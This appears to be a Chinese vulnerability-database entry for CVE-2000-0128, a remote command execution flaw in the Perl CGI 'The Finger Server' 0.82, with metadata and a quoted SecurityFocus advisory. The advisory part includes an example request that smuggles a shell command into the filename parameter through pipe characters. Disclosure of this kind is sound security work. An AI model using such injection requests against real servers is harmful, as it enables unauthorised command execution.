Finger Server命令执行漏洞

Finger Server命令执行漏洞

漏洞ID 1105703 漏洞类型 未知
发布时间 2000-02-04 更新时间 2005-05-02
图片[1]-Finger Server命令执行漏洞-安全小百科CVE编号 CVE-2000-0128
图片[2]-Finger Server命令执行漏洞-安全小百科CNNVD-ID CNNVD-200002-029
漏洞平台 CGI CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/19745
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200002-029
|漏洞详情
TheFingerServer0.82版本存在漏洞。远程攻击者可以借助shell元变量执行命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/974/info

'The Finger Server' is a perl script for providing .plan-like functionality through a website. Due to insufficient input checking it is possible for remote unauthenticated users to execute shell commands on the server which will run with the priveleges of the webserver. 

A request like:
http ://target/finger.cgi?action=archives&cmd=specific
&filename=99.10.28.15.23.username.|<shell command>|
(split for readability)
will cause the server to execute whatever command is specified.
|参考资料

来源:www.glazed.org
链接:http://www.glazed.org/finger/changelog.txt
来源:OSVDB
名称:7610
链接:http://www.osvdb.org/7610

相关推荐: FreeBSD exec() Inherited Signal Handler Vulnerability

FreeBSD exec() Inherited Signal Handler Vulnerability 漏洞ID 1103072 漏洞类型 Design Error 发布时间 2001-07-10 更新时间 2001-07-10 CVE编号 N/A CNN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享